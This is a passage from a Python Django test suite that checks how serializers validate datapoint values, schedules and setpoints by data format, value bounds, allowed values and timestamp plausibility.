for test_data_value in [1, 2.2, True, False]:
dp.data_format = data_format
dp.allowed_values = [test_data_value]
dp.save()
test_data = {
"value": json.dumps(test_data_value),
"timestamp": timestamp_utc_now(),
}
serializer = DatapointValueSerializer(dp, data=test_data)
caught_execption = None
try:
assert serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "value" in caught_execption.detail
# Check that JSON encoded strings (Nones are valid too)are encoded
# during validation.
for test_data_value in ["not a number", None]:
dp.data_format = data_format
dp.allowed_values = [test_data_value]
dp.save()
test_data = {
"value": json.dumps(test_data_value),
"timestamp": timestamp_utc_now(),
}
serializer = DatapointValueSerializer(dp, data=test_data)
assert serializer.is_valid(raise_exception=True)
assert serializer.validated_data["value"] == test_data_value
def test_bool_values_validated(self):
"""
Verify that bool datapoints only accept boolean values.
"""
dp = self.datapoint
dp.data_format = "bool"
for test_data_value in [1, 2.2, "not a number", None]:
dp.allowed_values = [test_data_value]
dp.save()
test_data = {
"value": json.dumps(test_data_value),
"timestamp": timestamp_utc_now(),
}
serializer = DatapointValueSerializer(dp, data=test_data)
caught_execption = None
try:
assert serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "value" in caught_execption.detail
# Check that JSON encoded bools are encoded during validation.
for test_data_value in [True, False]:
dp.allowed_values = [test_data_value]
dp.save()
test_data = {
"value": json.dumps(test_data_value),
"timestamp": timestamp_utc_now(),
}
serializer = DatapointValueSerializer(dp, data=test_data)
assert serializer.is_valid(raise_exception=True)
assert serializer.validated_data["value"] == test_data_value
def test_unknown_format_values_accept_anything(self):
"""
Datapoints with unknown format should accept anything.
"""
dp = self.datapoint
dp.data_format = "unknown"
dp.allowed_values = [] # Is empty to prove that it is not used.
dp.save()
for test_data_value in [1, 2.2, "not a number", None, True, False]:
test_data = {
"value": json.dumps(test_data_value),
"timestamp": timestamp_utc_now(),
}
serializer = DatapointValueSerializer(dp, data=test_data)
assert serializer.is_valid(raise_exception=True)
assert serializer.validated_data["value"] == test_data_value
def test_value_in_min_max(self):
"""
Check that for continous numeric datapoints only those values are
accepted that reside within the min/max bound, at least if min/max
are set.
"""
dp = self.datapoint
dp.data_format = "continuous_numeric"
dp.save()
valid_combinations = [
{"min": 1.00, "max": 3.00, "value": 2.00},
{"min": None, "max": None, "value": 2.00},
{"min": 1.00, "max": 3.00, "value": None},
{"min": None, "max": 3.00, "value": 0.00},
{"min": 1.00, "max": None, "value": 4.00},
]
for valid_combination in valid_combinations:
dp.min_value = valid_combination["min"]
dp.max_value = valid_combination["max"]
dp.save()
test_data = {
"value": json.dumps(valid_combination["value"]),
"timestamp": timestamp_utc_now(),
}
serializer = DatapointValueSerializer(dp, data=test_data)
try:
is_valid = serializer.is_valid(raise_exception=True)
except Exception:
logger.exception(
"test_value_in_min_max failed for valid combination %s",
str(valid_combination)
)
is_valid = False
assert is_valid
invalid_combinations = [
{"min": 1.00, "max": 3.00, "value": 4.00},
{"min": 1.00, "max": 3.00, "value": 0.00},
{"min": None, "max": 3.00, "value": 4.00},
{"min": 1.00, "max": None, "value": 0.00},
]
for invalid_combination in invalid_combinations:
dp.min_value = invalid_combination["min"]
dp.max_value = invalid_combination["max"]
dp.save()
test_data = {
"value": json.dumps(invalid_combination["value"]),
"timestamp": timestamp_utc_now(),
}
serializer = DatapointValueSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
if caught_execption is None:
logger.error(
"test_value_in_min_max failed for invalid combination %s",
str(invalid_combination)
)
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "value" in caught_execption.detail
def test_value_in_allowed_values(self):
"""
Check that for discrete valued datapoints only those values are
accepted that have one of the accepted values.
"""
dp = self.datapoint
dp.description = "A sensor datapoint for testing"
dp.data_format = "continuous_numeric"
dp.save()
valid_combinations = [
{
"value": 2.0,
"data_format": "discrete_numeric",
"allowed_values": [1.0, 2.0, 3.0]
},
{
"value": 2,
"data_format": "discrete_numeric",
"allowed_values": [1, 2, 3]
},
{
"value": "OK",
"data_format": "discrete_text",
"allowed_values": ["OK", "Done"]
},
{
"value": None,
"data_format": "discrete_text",
"allowed_values": [None, "Nope"]
},
]
for valid_combination in valid_combinations:
dp.data_format = valid_combination["data_format"]
dp.allowed_values = valid_combination["allowed_values"]
dp.save()
test_data = {
"value": json.dumps(valid_combination["value"]),
"timestamp": timestamp_utc_now(),
}
serializer = DatapointValueSerializer(dp, data=test_data)
try:
is_valid = serializer.is_valid(raise_exception=True)
except Exception:
logger.exception(
"test_value_in_allowed_values failed for valid "
"combination %s",
str(valid_combination)
)
is_valid = False
assert is_valid
invalid_combinations = [
{
"value": 2.0,
"data_format": "discrete_numeric",
"allowed_values": [1.0, 3.0]
},
{
"value": 2,
"data_format": "discrete_numeric",
"allowed_values": [1, 3]
},
{
"value": 2,
"data_format": "discrete_numeric",
"allowed_values": []
},
{
"value": "OK",
"data_format": "discrete_text",
"allowed_values": ["NotOK", "OK "]
},
{
"value": "",
"data_format": "discrete_text",
"allowed_values": ["OK"]
},
{
"value": None,
"data_format": "discrete_text",
"allowed_values": ["OK"]
},
]
for invalid_combination in invalid_combinations:
dp.data_format = invalid_combination["data_format"]
dp.allowed_values = invalid_combination["allowed_values"]
dp.save()
test_data = {
"value": json.dumps(invalid_combination["value"]),
"timestamp": timestamp_utc_now(),
}
serializer = DatapointValueSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
if caught_execption is None:
logger.exception(
"test_value_in_allowed_values failed for invalid "
"combination %s",
str(valid_combination)
)
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "value" in caught_execption.detail
def test_timestamp_validated(self):
"""
Check that the serialzer doesn't accept unresonable low or high
timestamp values, nor strings.'
"""
wrong_timestamps = [
timestamp_utc_now() + 2e11,
timestamp_utc_now() - 2e11,
"asdkajsdkajs"
]
for timestamp in wrong_timestamps:
test_data = {
"value": json.dumps(None),
"timestamp": timestamp,
}
serializer = DatapointValueSerializer(
self.datapoint, data=test_data
)
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "timestamp" in caught_execption.detail
class TestDatapointScheduleSerializer(TransactionTestCase):
@classmethod
def setUpClass(cls):
# Datapoint model is abstract, hence no table exists. Here we
# create a concrete model as child of datapoint and create a table
# on the fly for testing.
class Datapoint(DatapointTemplate):
class Meta:
app_label="test_message_format_models_6"
class DatapointSchedule(DatapointScheduleTemplate):
class Meta:
app_label="test_message_format_models_6"
# The datapoint foreign key must be overwritten as it points
# to the abstract datapoint model by default.
datapoint = models.ForeignKey(
Datapoint,
on_delete=models.CASCADE,
)
cls.Datapoint = Datapoint
cls.DatapointSchedule = DatapointSchedule
with connection.schema_editor() as schema_editor:
schema_editor.create_model(cls.Datapoint)
schema_editor.create_model(cls.DatapointSchedule)
# Create a dummy datapoint to be used as foreign key for the msgs.
cls.datapoint = cls.Datapoint(type="sensor")
cls.datapoint.save()
# Here are the default field values:
cls.default_field_values = {"datapoint": cls.datapoint}
@classmethod
def tearDownClass(cls) -> None:
# Finally, erase the table of the temporary model.
with connection.schema_editor() as schema_editor:
schema_editor.delete_model(cls.Datapoint)
schema_editor.delete_model(cls.DatapointSchedule)
def tearDown(self):
"""
Remove the dummy datapoint, so next test starts with empty tables.
"""
self.DatapointSchedule.objects.all().delete()
def test_to_representation(self):
"""
Check that a schedule message is serialized as expected.
"""
expected_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
'value': 21
},
{
"from_timestamp": timestamp_utc_now() + 1000,
"to_timestamp": None,
'value': None
}
],
"timestamp": timestamp_utc_now(),
}
field_values = self.default_field_values.copy()
field_values.update({
"schedule": expected_data["schedule"],
"time": datetime_from_timestamp(expected_data["timestamp"])
})
dp_schedule = self.DatapointSchedule.objects.create(**field_values)
serializer = DatapointScheduleSerializer(dp_schedule)
assert serializer.data == expected_data
#
# # Deactivated. None is currently not defined as a valid schedule
#
# def test_to_representation_for_none(self):
# """
# Check that a schedule message is serialized as expected if the
# schedule is None.
# """
# expected_data = {
# "schedule": None,
# "timestamp": timestamp_utc_now(),
# }
#
# field_values = self.default_field_values.copy()
# field_values.update({
# "schedule": expected_data["schedule"],
# "timestamp": datetime_from_timestamp(expected_data["timestamp"])
# })
# dp_schedule = self.DatapointSchedule.objects.create(**field_values)
#
# serializer = DatapointScheduleSerializer(dp_schedule)
# assert serializer.data == expected_data
def test_required_fields(self):
"""
Check that schedule and timestamp fields must be given.
"""
dp = self.datapoint
test_data = {}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
assert "timestamp" in caught_execption.detail
def test_timestamp_validated(self):
"""
Check that the serialzer doesn't accept unresonable low or high
timestamp values, nor strings.'
"""
wrong_timestamps = [
timestamp_utc_now() + 2e11,
timestamp_utc_now() - 2e11,
"asdkajsdkajs"
]
for timestamp in wrong_timestamps:
test_data = {
"schedule": None,
"timestamp": timestamp,
}
serializer = DatapointScheduleSerializer(
self.datapoint, data=test_data
)
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "timestamp" in caught_execption.detail
def test_schedule_validated_as_correct_json_or_null(self):
"""
Check that the schedule is validated to be a parsable as json.
"""
dp = self.datapoint
dp.data_format = "generic_text"
dp.save()
# First this is correct json.
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
assert serializer.is_valid(raise_exception=True)
#
# # This is currently not a valid schedule anymore.
#
# # This is also ok.
# test_data = {
# "schedule": None,
# "timestamp": timestamp_utc_now(),
# }
# serializer = DatapointScheduleSerializer(dp, data=test_data)
# assert serializer.is_valid(raise_exception=True)
def test_schedule_validated_as_list(self):
"""
Check that the schedule is validated to be a list.
"""
dp = self.datapoint
dp.data_format = "generic_text"
dp.save()
# This is correct json but not a list of schedule items.
test_data = {
"schedule": {"Nope": 1},
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
def test_schedule_items_validated_as_dict(self):
"""
Check that the schedule items are validated to be dicts.
"""
dp = self.datapoint
dp.data_format = "generic_text"
dp.save()
# This is correct json but not a list of schedule items.
test_data = {
"schedule": ["Nope", 1],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
def test_schedule_items_validated_for_expected_keys(self):
"""
Check that the schedule items are validated to contain only the
expected keys and nothing else.
"""
dp = self.datapoint
dp.data_format = "generic_text"
dp.save()
# Missing from_timestamp
test_data = {
"schedule": [
{
"to_timestamp": timestamp_utc_now() + 1000,
"value": json.dumps("not a number"),
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "from_timestamp" in exception_detail
# Missing to_timestamp
test_data = {
"schedule": [
{
"from_timestamp": None,
"value": json.dumps("not a number"),
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "to_timestamp" in exception_detail
# Missing value
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "value" in exception_detail
# This test doesn't work if the serializer fields are explicitly
# defined. Here the serializer simply ignores additional keys.
#
# # Additional value
# test_data = {
# "schedule": [
# {
# "from_timestamp": None,
# "to_timestamp": timestamp_utc_now() + 1000,
# "value": json.dumps("not a number"),
# "not_expected_field": "Should fail"
# }
# ],
# "timestamp": timestamp_utc_now(),
# }
# serializer = DatapointScheduleSerializer(dp, data=test_data)
# caught_execption = None
# try:
# serializer.is_valid(raise_exception=True)
# except Exception as e:
# caught_execption = e
# assert caught_execption is not None
# assert caught_execption.status_code == 400
# assert "schedule" in caught_execption.detail
def test_numeric_value_of_schedule_validated(self):
"""
Check that for numeric data_format values, only numeric values are
accepted within schedules.
"""
dp = self.datapoint
dp.allowed_values = '["not a number"]'
dp.save()
numeric_data_formats = [
"generic_numeric",
"continuous_numeric",
"discrete_numeric",
]
for data_format in numeric_data_formats:
dp.data_format = data_format
dp.save()
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "cannot be parsed to float" in exception_detail
# Also verify the oposite, that text values are not rejected
text_data_formats = [
"generic_text",
"discrete_text",
]
for data_format in text_data_formats:
dp.data_format = data_format
dp.save()
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
assert serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is None
def test_value_in_min_max(self):
"""
Check that for continous numeric datapoints only those values are
accepted that reside within the min/max bound, at least if min/max
are set.
"""
dp = self.datapoint
dp.data_format = "continuous_numeric"
dp.save()
valid_combinations = [
{"min": 1.00, "max": 3.00, "value": 2.00},
{"min": None, "max": None, "value": 2.00},
{"min": 1.00, "max": 3.00, "value": None},
{"min": None, "max": 3.00, "value": 0.00},
{"min": 1.00, "max": None, "value": 4.00},
]
for valid_combination in valid_combinations:
dp.min_value = valid_combination["min"]
dp.max_value = valid_combination["max"]
dp.save()
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"value": json.dumps(valid_combination["value"])
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
try:
is_valid = serializer.is_valid(raise_exception=True)
except Exception:
logger.exception(
"test_value_in_min_max failed for valid combination %s",
str(valid_combination)
)
is_valid = False
assert is_valid
invalid_combinations = [
{"min": 1.00, "max": 3.00, "value": 4.00},
{"min": 1.00, "max": 3.00, "value": 0.00},
{"min": None, "max": 3.00, "value": 4.00},
{"min": 1.00, "max": None, "value": 0.00},
]
for invalid_combination in invalid_combinations:
dp.min_value = invalid_combination["min"]
dp.max_value = invalid_combination["max"]
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"value": json.dumps(invalid_combination["value"])
},
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
if caught_execption is None:
logger.error(
"test_value_in_min_max failed for invalid combination %s",
str(invalid_combination)
)
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "numeric datapoint" in exception_detail
def test_value_in_allowed_values(self):
"""
Check that for discrete valued datapoints only those values are
accepted that have one of the accepted values.
"""
dp = self.datapoint
dp.data_format = "continuous_numeric"
dp.save()
valid_combinations = [
{
"value": 2.0,
"data_format": "discrete_numeric",
"allowed_values": [1.0, 2.0, 3.0]
},
{
"value": 2,
"data_format": "discrete_numeric",
"allowed_values": [1, 2, 3]
},
{
"value": "OK",
"data_format": "discrete_text",
"allowed_values": ["OK", "Done"]
},
{
"value": None,
"data_format": "discrete_text",
"allowed_values": [None, "Nope"]
},
]
for valid_combination in valid_combinations:
dp.data_format = valid_combination["data_format"]
dp.allowed_values = valid_combination["allowed_values"]
dp.save()
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"value": json.dumps(valid_combination["value"])
},
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
try:
is_valid = serializer.is_valid(raise_exception=True)
except Exception:
logger.exception(
"test_value_in_allowed_values failed for valid "
"combination %s",
str(valid_combination)
)
is_valid = False
assert is_valid
invalid_combinations = [
{
"value": 2.0,
"data_format": "discrete_numeric",
"allowed_values": [1.0, 3.0]
},
{
"value": 2,
"data_format": "discrete_numeric",
"allowed_values": [1, 3]
},
{
"value": 2,
"data_format": "discrete_numeric",
"allowed_values": []
},
{
"value": "OK",
"data_format": "discrete_text",
"allowed_values": ["NotOK", "OK "]
},
{
"value": "",
"data_format": "discrete_text",
"allowed_values": ["OK"]
},
{
"value": None,
"data_format": "discrete_text",
"allowed_values": ["OK"]
},
]
for invalid_combination in invalid_combinations:
dp.data_format = invalid_combination["data_format"]
dp.allowed_values = invalid_combination["allowed_values"]
dp.save()
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"value": json.dumps(valid_combination["value"])
},
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
if caught_execption is None:
logger.exception(
"test_value_in_allowed_values failed for invalid "
"combination %s",
str(valid_combination)
)
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "discrete datapoint" in exception_detail
def test_timestamps_are_validated_against_each_other(self):
"""
Check that if from_timestamp and to_timestamp is set not None,
it is validated that to_timestamp is larger.
"""
dp = self.datapoint
dp.data_format = "generic_text"
dp.save()
test_data = {
"schedule": [
{
"from_timestamp": timestamp_utc_now(),
"to_timestamp": timestamp_utc_now() - 1000,
"value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "timestamp must be larger" in exception_detail
def test_timestamps_are_validated_to_be_numbers(self):
"""
Check that if from_timestamp and to_timestamp are validated to be
None or convertable to a number.
"""
dp = self.datapoint
dp.data_format = "generic_text"
dp.save()
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": "not 1564489613491",
"value": json.dumps('not a number')
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "integer" in exception_detail
test_data = {
"schedule": [
{
"from_timestamp": "not 1564489613491",
"to_timestamp": None,
"value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "integer" in exception_detail
def test_timestamps_not_in_milliseconds_yield_error(self):
"""
Check that an error message is yielded if the timestamp is in
obviously not in milliseconds.
"""
dp = self.datapoint
dp.data_format = "generic_text"
dp.save()
# timestamp in seconds.
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": round(timestamp_utc_now() / 1000),
"value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "seems unreasonably low" in exception_detail
test_data = {
"schedule": [
{
"from_timestamp": round(timestamp_utc_now() / 1000),
"to_timestamp": None,
"value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "seems unreasonably low" in exception_detail
# timestamp in microseconds.
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": round(timestamp_utc_now() * 1000),
"value": json.dumps("not a number'")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "seems unreasonably high" in exception_detail
test_data = {
"schedule": [
{
"from_timestamp": round(timestamp_utc_now() * 1000),
"to_timestamp": None,
"value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
exception_detail = str(caught_execption.detail["schedule"])
assert "seems unreasonably high" in exception_detail
class TestDatapointSetpointSerializer(TransactionTestCase):
@classmethod
def setUpClass(cls):
# Datapoint model is abstract, hence no table exists. Here we
# create a concrete model as child of datapoint and create a table
# on the fly for testing.
class Datapoint(DatapointTemplate):
class Meta:
app_label="test_message_format_models_7"
class DatapointSetpoint(DatapointSetpointTemplate):
class Meta:
app_label="test_message_format_models_7"
# The datapoint foreign key must be overwritten as it points
# to the abstract datapoint model by default.
datapoint = models.ForeignKey(
Datapoint,
on_delete=models.CASCADE,
)
cls.Datapoint = Datapoint
cls.DatapointSetpoint = DatapointSetpoint
with connection.schema_editor() as schema_editor:
schema_editor.create_model(cls.Datapoint)
schema_editor.create_model(cls.DatapointSetpoint)
# Create a dummy datapoint to be used as foreign key for the msgs.
cls.datapoint = cls.Datapoint(type="sensor")
cls.datapoint.save()
# Here are the default field values:
cls.default_field_values = {"datapoint": cls.datapoint}
@classmethod
def tearDownClass(cls) -> None:
# Finally, erase the table of the temporary model.
with connection.schema_editor() as schema_editor:
schema_editor.delete_model(cls.Datapoint)
schema_editor.delete_model(cls.DatapointSetpoint)
def setUp(self):
"""
Reset datapoint metadata after each test, to prevent unexpected
validation errors due to value checking and stuff.
"""
self.datapoint.data_format = "generic_text"
self.datapoint.save()
def tearDown(self):
"""
Remove the dummy datapoint, so next test starts with empty tables.
"""
self.DatapointSetpoint.objects.all().delete()
def test_to_representation(self):
"""
Check that a setpoint message is serialized as expected.
"""
expected_data = {
"setpoint": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
'preferred_value': json.dumps(21),
'acceptable_values': [20.5, 21, 21.5],
},
{
"from_timestamp": timestamp_utc_now() + 1000,
"to_timestamp": None,
'preferred_value': json.dumps(None),
'acceptable_values': [None]
}
],
"timestamp": timestamp_utc_now(),
}
field_values = self.default_field_values.copy()
field_values.update({
"setpoint": expected_data["setpoint"],
"time": datetime_from_timestamp(expected_data["timestamp"])
})
dp_schedule = self.DatapointSetpoint.objects.create(**field_values)
serializer = DatapointSetpointSerializer(dp_schedule)
assert serializer.data == expected_data
#
# # Deactivated. None is currently not defined as a valid setpoint
#
# def test_to_representation_for_none(self):
#
# """
# Check that a setpoint message is serialized as expected if the
# setpoint is None.
# """
# expected_data = {
# "setpoint": None,
# "timestamp": timestamp_utc_now(),
# }
#
# field_values = self.default_field_values.copy()
# field_values.update({
# "setpoint": expected_data["setpoint"],
# "timestamp": datetime_from_timestamp(expected_data["timestamp"])
# })
# dp_schedule = self.DatapointSetpoint.objects.create(**field_values)
#
# serializer = DatapointSetpointSerializer(dp_schedule)
# assert serializer.data == expected_data
def test_required_fields(self):
"""
Check that setpoint and timestamp fields must be given.
"""
dp = self.datapoint
test_data = {}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
assert "timestamp" in caught_execption.detail
def test_timestamp_validated(self):
"""
Check that the serialzer doesn't accept unresonable low or high
timestamp values, nor strings.'
"""
wrong_timestamps = [
timestamp_utc_now() + 2e11,
timestamp_utc_now() - 2e11,
"asdkajsdkajs"
]
for timestamp in wrong_timestamps:
test_data = {
"setpoint": None,
"timestamp": timestamp,
}
serializer = DatapointSetpointSerializer(
self.datapoint, data=test_data
)
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "timestamp" in caught_execption.detail
def test_setpoint_validated_as_correct_json_or_null(self):
"""
Check that the setpoint is validated to be a parsable as json.
"""
dp = self.datapoint
# First this is correct json.
test_data = {
"setpoint": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
'preferred_value': json.dumps('not a number')
},
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
assert serializer.is_valid()
#
# # This is currently not a valid setpoint anymore.
#
# # This is also ok.
# test_data = {
# "setpoint": json.dumps(None),
# "timestamp": timestamp_utc_now(),
# }
# serializer = DatapointSetpointSerializer(dp, data=test_data)
# assert serializer.is_valid()
def test_setpoint_validated_as_list(self):
"""
Check that the setpoint is validated to be a list.
"""
dp = self.datapoint
# This is correct json but not a list of setpoint items.
test_data = {
"setpoint": {"Nope": 1},
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
def test_setpoint_items_validated_as_dict(self):
"""
Check that the setpoint items are validated to be dicts.
"""
dp = self.datapoint
# This is correct json but not a list of setpoint items.
test_data = {
"setpoint": ["Nope", 1],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
def test_setpoint_items_validated_for_expected_keys(self):
"""
Check that the setpoint items are validated to contain only the
expected keys and nothing else.
"""
dp = self.datapoint
always_required_keys = [
"from_timestamp",
"to_timestamp",
"preferred_value"
]
only_con_keys = [
"min_value",
"max_value"
]
only_dis_keys = [
"acceptable_values"
]
# Here a listing which keys must be given in a setpoint message per
# data_format.
required_keys_per_data_format = {
"generic_numeric": always_required_keys,
"continuous_numeric": always_required_keys + only_con_keys,
"discrete_numeric": always_required_keys + only_dis_keys,
"generic_text": always_required_keys,
"discrete_text": always_required_keys + only_dis_keys,
}
#
# This is not used, see below.
#
# # Here a list of keys which will be tested as extra keys, that should
# # be refused. The keys that are valid for other data_formats are of
# # course especially interesting.
# nvk = ["no_valid_key"]
# unexpected_keys_per_data_format = {
# "generic_numeric": nvk + only_con_keys + only_dis_keys,
# "continuous_numeric": nvk + only_dis_keys,
# "discrete_numeric": nvk + only_con_keys,
# "generic_text": nvk + only_con_keys + only_dis_keys,
# "discrete_text": nvk + only_con_keys,
# }
# Here the dummy values for all fields used above.
setpoint_all_fields = {
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"preferred_value": json.dumps(21),
"acceptable_values": [20.5, 21, 21.5],
"min_value": 20.5,
"max_value": 21.5,
"no_valid_key": 1337
}
for data_format in required_keys_per_data_format:
dp.data_format = data_format
dp.save()
required_keys = required_keys_per_data_format[data_format]
# Now construct per data_format test cases to verify that every
# missing field is found for every data_format.
for key_left_out in required_keys:
setpoint = {}
for key in required_keys:
if key == key_left_out:
continue
setpoint[key] = setpoint_all_fields[key]
test_data = {
"setpoint": [setpoint],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
logger.error(
"Failed to identify required key (%s) while validating"
"setpoint data for data_format (%s)" %
